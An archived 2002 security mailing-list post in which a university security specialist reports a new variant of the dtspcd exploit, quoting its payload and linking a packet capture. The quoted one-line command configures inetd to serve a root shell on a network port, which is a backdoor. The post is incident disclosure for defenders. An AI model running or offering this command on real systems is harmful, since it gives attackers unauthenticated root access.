Security Incidents mailing list archives
variation of the dtspcd exploit?
From: "Nathan W. Labadie" <ab0781 () wayne edu>
Date: Thu, 14 Feb 2002 16:07:10 -0500
Until last week, all the dtspcd exploits I'd seen had been the same (inetd, ingreslock, /tmp/x, etc). Looks like there is a new one floating around. The ASCII output looks something like this: /bin/ksh -c echo 'rje stream tcp nowait root /bin/sh sh -i'> /tmp/z; /usr/sbin/inetd -s /tmp/z; sleep 10; A copy of the capture can be downloaded from here: http://security.wayne.edu/downloads/dtspcd-1.cap -- Nathan W. Labadie | ab0781 () wayne edu Sr. Security Specialist | 313/577.2126 Wayne State University | 313/577.1338 fax C&IT Information Security Office: http://security.wayne.edu ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- variation of the dtspcd exploit? Nathan W. Labadie (Feb 14)
- Re: variation of the dtspcd exploit? Valdis . Kletnieks (Feb 15)